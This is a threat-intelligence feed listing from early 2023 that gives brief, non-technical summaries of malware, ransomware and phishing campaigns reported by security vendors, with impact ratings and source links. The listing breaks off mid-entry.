Intel Name:
North_Korea_s_UNC2970_TTPs_Part_1_and_2
Date of Scan:
2023-03-15
Impact:
MEDIUM
Summary:
During their investigation, Mandiant researchers discovered most of the original compromised hosts targeted by UNC2970. Mandiant Managed Defense also found that this group is targeting a U.S.-based technology company.
Source: https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970 https://www.mandiant.com/resources/blog/lightshift-and-lightshow
2023-03-15
A_CHM_malware_by_the_Kimsuky_group
LOW
Intel Source:
ASEC
Intel Name:
A_CHM_malware_by_the_Kimsuky_group
Date of Scan:
2023-03-15
Impact:
LOW
Summary:
ASEC has discovered a new CHM malware created by the Kimsuky group. This malware type is the same one that the researchers mentioned earlier in their posts on the malware distributed by the Kimsuky group, its goal being the exfiltration of user information.
Source: https://asec.ahnlab.com/en/49295/
2023-03-15
Increasingly_Abusing_of_DigitalOcean_by_attackers
LOW
Intel Source:
Netskope
Intel Name:
Increasingly_Abusing_of_DigitalOcean_by_attackers
Date of Scan:
2023-03-15
Impact:
LOW
Summary:
Netskope Threat Labs observed increased traffic to malicious web pages hosted on DigitalOcean in the last couple of months. This new scam campaign mimics Windows Defender and tries to deceive users into believing that their computer is infected. The purpose of the scam is to lure victims into calling a fraudulent “help line”, where the attackers try to gain remote access to the victim’s computer to either install malware or request payment.
Source: https://www.netskope.com/blog/attackers-increasingly-abusing-digitalocean-to-host-scams-and-phishing
2023-03-14
The_new_ATM_Malware_FiXS
LOW
Intel Source:
MetaBase Q
Intel Name:
The_new_ATM_Malware_FiXS
Date of Scan:
2023-03-14
Impact:
LOW
Summary:
FiXS is a new ATM malware that steals data from ATMs and infects computers. Metabase Q has been tracking and monitoring the rise of ATM malware that takes advantage of both the physical and digital components of the ATM.
Source: https://www.metabaseq.com/fixs-atms-malware/
2023-03-14
New_capabilities_of_Prometei_botnet
MEDIUM
Intel Source:
Talos
Intel Name:
New_capabilities_of_Prometei_botnet
Date of Scan:
2023-03-14
Impact:
MEDIUM
Summary:
Researchers from Talos have observed Prometei with updated infrastructure components and capabilities. The botnet operators updated certain submodules of the execution chain to automate processes and hinder forensic analysis. The threat actors are actively spreading an improved Linux version of the Prometei bot, v3. Researchers have also observed new functionality, including an additional C2 domain generation algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache web server with a web shell. The bot's activity is possibly influenced by the war in Ukraine.
Source: https://blog.talosintelligence.com/prometei-botnet-improves/
2023-03-14
Emotet_resumes_sending_malicious_emails
LOW
Intel Source:
Cofense
Intel Name:
Emotet_resumes_sending_malicious_emails
Date of Scan:
2023-03-14
Impact:
LOW
Summary:
Researchers from Cofense have discovered that, after several months of inactivity, the Emotet botnet resumed email activity this morning at 8:00am EST. The malicious emails appear to reply to existing email chains, with the addition of an attached .zip file. The .zip files are not password protected. The themes of the attached files include finances and invoices.
Source: https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/
2023-03-13
AsynRAT_Trojan_Distributing_via_Bill_Payment_Email
LOW
Intel Source:
ISC.SANS
Intel Name:
AsynRAT_Trojan_Distributing_via_Bill_Payment_Email
Date of Scan:
2023-03-13
Impact:
LOW
Summary:
Researchers from SANS observed that their mail server quarantined the file FautraPago392023.gz. After extracting the file with gunzip, there was no .exe extension associated with it. The source and destination addresses were both blank, with no actual email address.
Source: https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626/
2023-03-13
Netcat_Malware_Targeting_MS_SQL_Servers
LOW
Intel Source:
ASEC
Intel Name:
Netcat_Malware_Targeting_MS_SQL_Servers
Date of Scan:
2023-03-13
Impact:
LOW
Summary:
Researchers from ASEC have discovered the distribution of the Netcat malware targeting poorly managed MS-SQL servers. Netcat is a utility that allows users to send and receive data to and from specific destinations on a network over the TCP/UDP protocols.
Source: https://asec.ahnlab.com/en/49249/
2023-03-13
New_GoBruteforcer_Malware_Targeting_phpMyAdmin_MySQL_FTP_and_Postgres
MEDIUM
Intel Source:
PaloAlto
Intel Name:
New_GoBruteforcer_Malware_Targeting_phpMyAdmin_MySQL_FTP_and_Postgres
Date of Scan:
2023-03-13
Impact:
MEDIUM
Summary:
PaloAlto researchers have identified a newly discovered Golang-based botnet malware that scans for and infects web servers running phpMyAdmin, MySQL, FTP, and Postgres services.
Source: https://unit42.paloaltonetworks.com/gobruteforcer-golang-botnet/?web_view=true
2023-03-13
Overview_of_a_Mirai_Payload_Generator
LOW
Intel Source:
ISC.SANS
Intel Name:
Overview_of_a_Mirai_Payload_Generator
Date of Scan:
2023-03-13
Impact:
LOW
Summary:
Researchers from SANS have observed that their honeypot is still hit by hundreds of Mirai requests every day. Upon analysis, they found a Python script that generates a Mirai payload and deploys networking services to serve it via FTP, HTTP, and TFTP.
Source: https://isc.sans.edu/diary/Overview+of+a+Mirai+Payload+Generator/29624/
2023-03-13
New_Phishing_Scam_Using_Fake_SBA_Grants
LOW
Intel Source:
Cofense
Intel Name:
New_Phishing_Scam_Using_Fake_SBA_Grants
Date of Scan:
2023-03-13
Impact:
LOW
Summary:
Researchers from Cofense have observed a phishing campaign impersonating the US Small Business Administration (SBA) and offering fake grants in the hope that an unlucky recipient will provide their credentials.
Source: https://cofense.com/blog/fake-small-business-administration-sba-grant-used-in-new-phishing-scam/
2023-03-13
Chinese_Hacker_Running_Malware_on_Unpatched_SMA
LOW
Intel Source:
Mandiant
Intel Name:
Chinese_Hacker_Running_Malware_on_Unpatched_SMA
Date of Scan:
2023-03-13
Impact:
LOW
Summary:
Mandiant researchers have identified a suspected Chinese campaign that maintains long-term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has the functionality to steal user credentials, provide shell access, and persist through firmware upgrades. Mandiant currently tracks this actor as UNC4540.
Source: https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall
2023-03-13
BATLOADER_Malware_Leveraging_Google_Ads
MEDIUM
Intel Source:
Esentire
Intel Name:
BATLOADER_Malware_Leveraging_Google_Ads
Date of Scan:
2023-03-13
Impact:
MEDIUM
Summary:
Esentire researchers have discovered that the malware downloader known as BATLOADER is abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. The malicious ads spoof a wide range of legitimate apps and services such as Adobe, OpenAI's ChatGPT, Spotify, Tableau, and Zoom.
Source: https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif
2023-03-11
PlugX_Malware_Exploits_Remote_Desktop_Software_Flaws
MEDIUM
Intel Source:
ASEC
Intel Name:
PlugX_Malware_Exploits_Remote_Desktop_Software_Flaws
Date of Scan:
2023-03-11
Impact:
MEDIUM
Summary:
Researchers from ASEC have discovered that security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware.
Source: https://asec.ahnlab.com/en/49097/
2023-03-11
Chaos_Ransomware_Shadow_is_Cast_by_BlackSnake_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
Chaos_Ransomware_Shadow_is_Cast_by_BlackSnake_Ransomware
Date of Scan:
2023-03-11
Impact:
LOW
Summary:
Cyble Labs researchers have discovered a ransomware variant that not only encrypts victims' files but also steals their Discord tokens.
Source: https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/
2023-03-10
New_ScrubCrypt_Crypter_Targeting_Oracle_WebLogic
MEDIUM
Intel Source:
Fortinet
Intel Name:
New_ScrubCrypt_Crypter_Targeting_Oracle_WebLogic
Date of Scan:
2023-03-10
Impact:
MEDIUM
Summary:
Fortinet Lab researchers have observed that the attack chain commences with the successful exploitation of vulnerable Oracle WebLogic servers to download a PowerShell script that contains ScrubCrypt.
Source: https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt
2023-03-10
The_Use_of_Search_Engines_For_Malvertising
LOW
Intel Source:
Securelist
Intel Name:
The_Use_of_Search_Engines_For_Malvertising
Date of Scan:
2023-03-10
Impact:
LOW
Summary:
Researchers from Securelist have observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, are abusing the search engine promotion plan in order to deliver malicious payloads to victims’ machines.
Source: https://securelist.com/malvertising-through-search-engines/108996/
2023-03-10
IceFire_Ransomware_Exploiting_IBM_Aspera_Faspex
MEDIUM
Intel Source:
Sentinelone
Intel Name:
IceFire_Ransomware_Exploiting_IBM_Aspera_Faspex
Date of Scan:
2023-03-10
Impact:
MEDIUM
Summary:
SentinelOne researchers have identified that a Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world.
Source: https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
2023-03-09
Increasing_Phishing_Campaigns_During_Tax_Season
LOW
Intel Source:
Cofense
Intel Name:
Increasing_Phishing_Campaigns_During_Tax_Season
Date of Scan:
2023-03-09
Impact:
LOW
Summary:
Researchers from Cofense have identified threat actors using tax season to lure recipients with a potential refund, using the Adobe file-sharing service to deliver the phishing lure.
Source: https://cofense.com/blog/tax-season-phishing-campaigns-are-ramping-up/
2023-03-09
Analysis_of_Memory_For_Detecting_EDR_Nullifying_Malware
LOW
Intel Source:
Volexity
Intel Name:
Analysis_of_Memory_For_Detecting_EDR_Nullifying_Malware
Date of Scan:
2023-03-09
Impact:
LOW
Summary:
Volexity researchers have examined whether the technique of attacking endpoint detection and response (EDR) and antivirus (AV) software could be reliably detected through memory analysis.
Source: https://www.volexity.com/blog/2023/03/07/using-memory-analysis-to-detect-edr-nullifying-malware/
2023-03-09
Analysis_of_Nevada_Ransomware_and_Compares_With_Nokoyawa_Ransomware
LOW
Intel Source:
ZScaler
Intel Name:
Analysis_of_Nevada_Ransomware_and_Compares_With_Nokoyawa_Ransomware
Date of Scan:
2023-03-09
Impact:
LOW
Summary:
Zscaler ThreatLab has identified significant code similarities between the Nevada and Nokoyawa ransomware, including debug strings, command-line arguments, and encryption algorithms.
Source: https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant
2023-03-09
OneNote_Misused_by_Cybercriminals
LOW
Intel Source:
Trustwave
Intel Name:
OneNote_Misused_by_Cybercriminals
Date of Scan:
2023-03-09
Impact:
LOW
Summary:
Researchers from Trustwave have analyzed the activity of cybercriminals as to how they are abusing OneNote.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-1/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/
2023-03-08
PyPI_package_delivers_malicious_Colour_Blind_RAT
LOW
Intel Source:
Cyware
Intel Name:
PyPI_package_delivers_malicious_Colour_Blind_RAT
Date of Scan:
2023-03-08
Impact:
LOW
Summary:
Researchers from Cyware have identified a malicious PyPI package that delivers a fully-featured information stealer and remote access trojan dubbed Colour-Blind.
Source: https://cyware.com/news/malicious-pypi-package-delivers-colour-blind-rat-1c24f4e6/?web_view=true
2023-03-08
GlobeImposter_Ransomware_Installed_Using_RDP
LOW
Intel Source:
ASEC
Intel Name:
GlobeImposter_Ransomware_Installed_Using_RDP
Date of Scan:
2023-03-08
Impact:
LOW
Summary:
ASEC has recently discovered the active distribution of the GlobeImposter ransomware. This attack is being carried out by the threat actors behind MedusaLocker.
Source: https://asec.ahnlab.com/en/48940/
2023-03-08
In_Depth_Analysis_of_Sirattacker_and_ALC_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
In_Depth_Analysis_of_Sirattacker_and_ALC_Ransomware
Date of Scan:
2023-03-08
Impact:
MEDIUM
Summary:
FortiGuard Labs researchers have gathered data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. They analyzed the Sirattacker and ALC ransomware, which target Microsoft Windows users.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-sirattacker-acl?&web_view=true
2023-03-08
Qakbot_evolves_to_OneNote_Malware_Distribution
MEDIUM
Intel Source:
Trellix
Intel Name:
Qakbot_evolves_to_OneNote_Malware_Distribution
Date of Scan:
2023-03-08
Impact:
MEDIUM
Summary:
Researchers from Trellix have observed that Qakbot (aka QBot, QuakBot, and Pinkslipbot), a sophisticated piece of malware, has seen an upsurge in campaigns using a novel delivery technique: OneNote documents for malware distribution.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html
2023-03-08
Chinese_Cyber_Attack_Against_Southeast_Asian_Government_Entities
HIGH
Intel Source:
Checkpoint
Intel Name:
Chinese_Cyber_Attack_Against_Southeast_Asian_Government_Entities
Date of Scan:
2023-03-08
Impact:
HIGH
Summary:
Researchers from Checkpoint have analyzed the TTPs and the tools used in the espionage campaign against Southeast Asian government entities. The initial infection stages of this campaign use TTPs and tools consistent with Sharp Panda activity.
Source: https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/
2023-03-07
LokiBot_Distributing_via_Phishing_Emails
LOW
Intel Source:
PaloAlto
Intel Name:
LokiBot_Distributing_via_Phishing_Emails
Date of Scan:
2023-03-07
Impact:
LOW
Summary:
PaloAlto researchers have uncovered a malware distribution campaign that is delivering the LokiBot information stealer via business email compromise (BEC) phishing emails. This malware is designed to steal sensitive information from victims' systems, such as passwords and banking information, as well as other sensitive data.
Source: https://unit42.paloaltonetworks.com/lokibot-spike-analysis/
2023-03-07
New_HiatusRAT_Malware_Targeting_Business_Grade_Routers
MEDIUM
Intel Source:
Lumen
Intel Name:
New_HiatusRAT_Malware_Targeting_Business_Grade_Routers
Date of Scan:
2023-03-07
Impact:
MEDIUM
Summary:
Lumen researchers have observed malware that targets business-grade routers to covertly spy on victims in Latin America, Europe, and North America since at least July 2022.
Source: https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/
2023-03-07
Phishing_Campaign_Targeting_Job_Seekers_and_Employers
LOW
Intel Source:
Trellix
Intel Name:
Phishing_Campaign_Targeting_Job_Seekers_and_Employers
Date of Scan:
2023-03-07
Impact:
LOW
Summary:
Researchers from Trellix have discovered that threat actors are exploiting the ongoing economic downturn by using job-themed phishing and malware campaigns against job seekers and employers to steal sensitive information and compromise company recruiters.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/cybercrime-takes-advantage-of-2023-recession-with-job-themed-scams.html
2023-03-07
OneNote_Embedded_File_Abuse
LOW
Intel Source:
Nviso
Intel Name:
OneNote_Embedded_File_Abuse
Date of Scan:
2023-03-07
Impact:
LOW
Summary:
Researchers from Nviso have observed that the OneNote feature abused in these phishing campaigns is the hiding of embedded files behind pictures that entice the user to click. If the picture is clicked, the file hidden beneath it is executed.
Source: https://blog.nviso.eu/2023/02/27/onenote-embedded-file-abuse/
2023-03-07
Phishing_Campaign_Using_Copycat_ChatGPT_Platform
MEDIUM
Intel Source:
Bitdefender
Intel Name:
Phishing_Campaign_Using_Copycat_ChatGPT_Platform
Date of Scan:
2023-03-07
Impact:
MEDIUM
Summary:
Researchers from Bitdefender Labs have identified that the success of the viral AI tool has also attracted the attention of fraudsters, who use the technology to conduct highly sophisticated investment scams against unwary internet users.
Source: https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-warns-of-fresh-phishing-campaign-that-uses-copycat-chatgpt-platform-to-swindle-eager-investors/
2023-03-07
In_Depth_Analysis_of_RIG_Exploit_Kit
LOW
Intel Source:
PRODAFT
Intel Name:
In_Depth_Analysis_of_RIG_Exploit_Kit
Date of Scan:
2023-03-07
Impact:
LOW
Summary:
Researchers from Prodaft have analyzed the RIG Exploit Kit. It is operated under a MaaS subscription model and is currently enjoying the most successful period of its lifetime in terms of successful attacks.
Source: https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis
2023-03-07
The_Analysis_of_Lazarus_Group
LOW
Intel Source:
ASEC
Intel Name:
The_Analysis_of_Lazarus_Group
Date of Scan:
2023-03-07
Impact:
LOW
Summary:
ASEC researchers have identified that Lazarus group's malware strains have been found in various Korean companies related to national defense, satellites, software, media and press, etc. Hence, they tracked and analyzed the Lazarus threat group's activities and related malware.
Source: https://asec.ahnlab.com/en/48810/
2023-03-06
Spear_Phishing_Campaign_Targeting_Hospitality_Industry_Using_RedLine_Stealer
LOW
Intel Source:
TrendMicro
Intel Name:
Spear_Phishing_Campaign_Targeting_Hospitality_Industry_Using_RedLine_Stealer
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Researchers from TrendMicro have identified an evasive RedLine Stealer spear-phishing campaign targeting the hospitality industry.
Source: https://www.trendmicro.com/en_us/research/23/c/managed-xdr-exposes-spear-phishing-campaign-targeting-hospitalit.html
2023-03-06
LockBit_Ransomware_Attack_on_Indian_Companies
LOW
Intel Source:
Cyble
Intel Name:
LockBit_Ransomware_Attack_on_Indian_Companies
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Cyble researchers have observed that the LockBit ransomware group claimed to have compromised the networks of an Indian investment company, Infrastructure Leasing & Financial Services Limited (IL&FS), on February 28, 2023.
Source: https://blog.cyble.com/2023/03/01/ransomware-attack-on-ilfs/
2023-03-06
RIG_Exploit_Kit_Targeting_Internet_Explorer_Users
LOW
Intel Source:
Malwarebytes
Intel Name:
RIG_Exploit_Kit_Targeting_Internet_Explorer_Users
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Malwarebytes researchers have identified that Internet Explorer (IE) is still being exploited by exploit kits like the RIG exploit kit (EK).
Source: https://www.malwarebytes.com/blog/news/2023/03/internet-explorer-users-still-targeted-by-rig-exploit-kit
2023-03-06
WhiteSnake_Stealer_Targeting_Windows_and_Linux_Users
LOW
Intel Source:
Cyble
Intel Name:
WhiteSnake_Stealer_Targeting_Windows_and_Linux_Users
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Cyble researchers have discovered a new malware strain called “WhiteSnake” Stealer. This stealer is available in versions designed for both Windows and Linux. It is capable of gathering a range of sensitive information, including passwords, cookies, credit card numbers, screenshots, and other personal or financial data.
Source: https://blog.cyble.com/2023/02/24/new-whitesnake-stealer-offered-for-sale-via-maas-model/
2023-03-06
MyDoom_Worm_Distributing_via_Phishing_Email
LOW
Intel Source:
Fortinet
Intel Name:
MyDoom_Worm_Distributing_via_Phishing_Email
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Researchers from Fortinet have identified a phishing campaign using the MyDoom worm. MyDoom was first discovered back in 2004 and has seen some updates and modifications since its introduction.
Source: https://www.fortinet.com/blog/threat-research/just-because-its-old-doesnt-mean-you-throw-it-away-including-malware
2023-03-06
Hackers_From_China_Using_Custom_Backdoor_to_Evade_Detection
LOW
Intel Source:
Welivesecurity
Intel Name:
Hackers_From_China_Using_Custom_Backdoor_to_Evade_Detection
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Researchers from Welivesecurity have identified that the Chinese cyber espionage group Mustang Panda is deploying a new custom backdoor named 'MQsTTang' in attacks starting this year.
Source: https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/
2023-03-06
Hackers_From_SCARLETEEL_Using_Advanced_Cloud_Skills_to_Steal_Source_Code_and_Data
MEDIUM
Intel Source:
Sysdig
Intel Name:
Hackers_From_SCARLETEEL_Using_Advanced_Cloud_Skills_to_Steal_Source_Code_and_Data
Date of Scan:
2023-03-06
Impact:
MEDIUM
Summary:
Sysdig researchers have discovered a sophisticated cloud operation in a customer environment, dubbed SCARLETEEL, that resulted in stolen proprietary data. The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials.
Source: https://sysdig.com/blog/cloud-breach-terraform-data-theft/
2023-03-06
OneNote_Documents_Distributing_Malware
LOW
Intel Source:
ZScaler
Intel Name:
OneNote_Documents_Distributing_Malware
Date of Scan:
2023-03-06
Impact:
LOW
Summary:
Zscaler researchers have observed that threat actors are increasingly using Microsoft OneNote documents to deliver malware via phishing emails.
Source: https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
2023-03-06
The_New_TTPs_of_Royal_ransomware
MEDIUM
Intel Source:
CISA
Intel Name:
The_New_TTPs_of_Royal_ransomware
Date of Scan:
2023-03-06
Impact:
MEDIUM
Summary:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
2023-03-04
The_Examination_of_EXFILTRATION_22
LOW
Intel Source:
Cyfirma
Intel Name:
The_Examination_of_EXFILTRATION_22
Date of Scan:
2023-03-04
Impact:
LOW
Summary:
Researchers from Cyfirma have provided an analysis of a new post-exploitation framework called EXFILTRATOR-22, a.k.a. EX-22.
Source: https://www.cyfirma.com/outofband/exfiltrator-22-an-emerging-post-exploitation-framework/
2023-03-04
The_Deep_Investigation_of_LockBit_Ransomware_Campaign
MEDIUM
Intel Source:
Fortinet
Intel Name:
The_Deep_Investigation_of_LockBit_Ransomware_Campaign
Date of Scan:
2023-03-04
Impact:
MEDIUM
Summary:
FortiGuard Labs researchers observed a new LockBit ransomware campaign in December and January that used a combination of techniques effective against AV and EDR solutions, and analyzed the infection chain and tactics, techniques, and procedures (TTPs) of this campaign.
Source: https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign?&web_view=true
2023-03-04
The_deployment_of_New_MortalKombat_Ransomware_and_Laplas_Clipper_Malware_threats
MEDIUM
Intel Source:
Talos
Intel Name:
The_deployment_of_New_MortalKombat_Ransomware_and_Laplas_Clipper_Malware_threats
Date of Scan:
2023-03-04
Impact:
MEDIUM
Summary:
Since last December, the Cisco Talos team has been observing a new actor who used two new threats, MortalKombat ransomware and a Go variant of the Laplas Clipper malware, to steal cryptocurrency from victims. Talos researchers have also seen the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389, using one of their download servers that runs an RDP crawler and also serves the MortalKombat ransomware. After the researchers analyzed commonalities in the code, class names, and registry key strings, they assess that the MortalKombat ransomware belongs to the Xorist family.
Source: https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/
2023-03-03
BlackLotus_Malware_Capable_of_Bypassing_Secure_Boot
MEDIUM
Intel Source:
Welivesecurity
Intel Name:
BlackLotus_Malware_Capable_of_Bypassing_Secure_Boot
Date of Scan:
2023-03-03
Impact:
MEDIUM
Summary:
Researchers from Welivesecurity have identified that a stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first UEFI bootkit malware to bypass Secure Boot on Windows 11.
Source: https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
2023-03-01
Diving_Deep_into_TA_69_and_its_SocGholish_Payload
LOW
Intel Source:
Proofpoint
Intel Name:
Diving_Deep_into_TA_69_and_its_SocGholish_Payload
Date of Scan:
2023-03-01
Impact:
LOW
Summary:
Researchers from Proofpoint have observed changes in the tactics, techniques, and procedures (TTPs) employed by TA569. Changes include an increase in the number of injection varieties, as well as payloads deviating from the standard SocGholish “Fake Update” JavaScript packages.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond
2023-03-01
Snip3_Crypter_is_Back_With_New_TTPs
LOW
Intel Source:
ZScaler
Intel Name:
Snip3_Crypter_is_Back_With_New_TTPs
Date of Scan:
2023-03-01
Impact:
LOW
Summary:
Researchers from Zscaler have identified the use of the crypter with new TTPs, deploying RAT families including DcRAT and QuasarRAT against victims across multiple industry verticals such as healthcare, energy and utilities, and manufacturing, via spear-phishing emails with subject lines related to "tax statements" in order to lure victims into execution.
Source: https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time
2023-03-01
Iron_Tiger_Group_Targeting_Linux_Through_SysUpdate
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Iron_Tiger_Group_Targeting_Linux_Through_SysUpdate
Date of Scan:
2023-03-01
Impact:
MEDIUM
Summary:
Researchers from TrendMicro have identified that hackers from Iron Tiger updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.
Source: https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
2023-03-01
Hackers_From_Blind_Eagle_Targeting_Organizations_in_Colombia_and_Ecuador
LOW
Intel Source:
Blackberry
Intel Name:
Hackers_From_Blind_Eagle_Targeting_Organizations_in_Colombia_and_Ecuador
Date of Scan:
2023-03-01
Impact:
LOW
Summary:
BlackBerry researchers have identified a new campaign where the threat actor impersonated a Colombian government tax agency to target key industries in Colombia, including health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in the country.
Source: https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
2023-03-01
BB17_Distribution_Qakbot_Activity
LOW
Intel Source:
ISC.SANS
Intel Name:
BB17_Distribution_Qakbot_Activity
Date of Scan:
2023-03-01
Impact:
LOW
Summary:
Researchers from SANS have identified an infection from a URL found on VirusTotal after pivoting on a search for BB17-tagged Qakbot distribution URLs.
Source: https://isc.sans.edu/diary/rss/29592
2023-03-01
Hackers_From_Blackfly_Group_Targeting_Materials_Technology
LOW
Intel Source:
Symantec
Intel Name:
Hackers_From_Blackfly_Group_Targeting_Materials_Technology
Date of Scan:
2023-03-01
Impact:
LOW
Summary:
Symantec researchers have identified the Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackfly-espionage-materials
2023-03-01
Threat_Actors_Using_Microsoft_OneNote_for_Malicious_Campaigns
LOW
Intel Source:
Inquest
Intel Name:
Threat_Actors_Using_Microsoft_OneNote_for_Malicious_Campaigns
Date of Scan:
2023-03-01
Impact:
LOW
Summary:
Researchers from Inquest have observed that OneNote has featured in the delivery chains of a number of malware threats distributed by multiple groups.
Source: https://inquest.net/blog/2023/02/27/youve-got-malware-rise-threat-actors-using-microsoft-onenote-malicious-campaigns
2023-02-28
Hackers_Abusing_Atlassian
LOW
Intel Source:
Cofense
Intel Name:
Hackers_Abusing_Atlassian
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
Cofense researchers have observed a phishing campaign, under the guise of a payment remittance, taking advantage of custom URLs from Atlassian to redirect users to their phish.
Source: https://cofense.com/blog/threat-actors-abuse-atlassian-bypass-multiple-secure-email-gateways-segs/
2023-02-28
Analysis_of_FortiNAC_Vulnerability_CVE_2022_39952
LOW
Intel Source:
Cyble
Intel Name:
Analysis_of_FortiNAC_Vulnerability_CVE_2022_39952
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
Cyble researchers have analyzed the vulnerability affecting multiple versions of FortiNAC. The affected product is widely used in mid to large-size enterprises involving state and private entities.
Source: https://blog.cyble.com/2023/02/27/critical-vulnerability-in-fortinac-cve-2022-39952-exposes-multiple-organizations-to-cyberattacks/
2023-02-28
The_Investigation_of_PlugX_Trojan
LOW
Intel Source:
TrendMicro
Intel Name:
The_Investigation_of_PlugX_Trojan
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
TrendMicro researchers have discovered that a file called x32dbg.exe is used to sideload a malicious DLL they identified as a variant of PlugX.
Source: https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html
2023-02-28
PyPI_Malicious_Packages_Dropping_Windows_Trojan_via_Dropbox
LOW
Intel Source:
Sonatype
Intel Name:
PyPI_Malicious_Packages_Dropping_Windows_Trojan_via_Dropbox
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
Researchers from Sonatype have observed hundreds of packages being published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like "libs," "nvidiapaypalsuper," and so on, are named quite arbitrarily.
Source: https://blog.sonatype.com/attacker-floods-pypi-with-450-malicious-packages-that-drop-windows-trojan-via-dropbox
2023-02-28
URL_Files_and_WebDAV_Using_For_IcedID_Infection
LOW
Intel Source:
ISC.SANS
Intel Name:
URL_Files_and_WebDAV_Using_For_IcedID_Infection
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
Researchers from SANS have observed that IcedID distribution patterns occasionally change and identified a distribution pattern using .url files and WebDAV traffic for an IcedID infection.
Source: https://isc.sans.edu/diary/URL+files+and+WebDAV+used+for+IcedID+Bokbot+infection/29578/
2023-02-28
Malicious_Emails_Impersonating_Shipping_Companies
LOW
Intel Source:
ASEC
Intel Name:
Malicious_Emails_Impersonating_Shipping_Companies
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
Researchers from ASEC have discovered malicious emails impersonating shipping companies being distributed in Korea. These emails prompt users to open the attached file with the subject ‘Submitting import clearance info’.
Source: https://asec.ahnlab.com/en/48304/
2023-02-28
Cyber_attacks_on_the_Ukrainian_state_organizations
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Cyber_attacks_on_the_Ukrainian_state_organizations
Date of Scan:
2023-02-28
Impact:
MEDIUM
Summary:
Researchers from CERT-UA have investigated the violation of the integrity and availability of the web resources of a number of state organizations.
Source: https://cert.gov.ua/article/3947787
2023-02-28
Chile_IP_Address_Connecting_to_IcedID_BackConnect_C2_Servers
LOW
Intel Source:
Team Cymru
Intel Name:
Chile_IP_Address_Connecting_to_IcedID_BackConnect_C2_Servers
Date of Scan:
2023-02-28
Impact:
LOW
Summary:
Researchers from Team Cymru have identified an IP address geolocated to Chile that is used to access various elements of the IcedID infrastructure.
Source: https://www.team-cymru.com/post/from-chile-with-malware
2023-02-28
Magniber_Ransomware_is_Back_With_New_Technique
LOW
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_is_Back_With_New_Technique
Date of Scan:
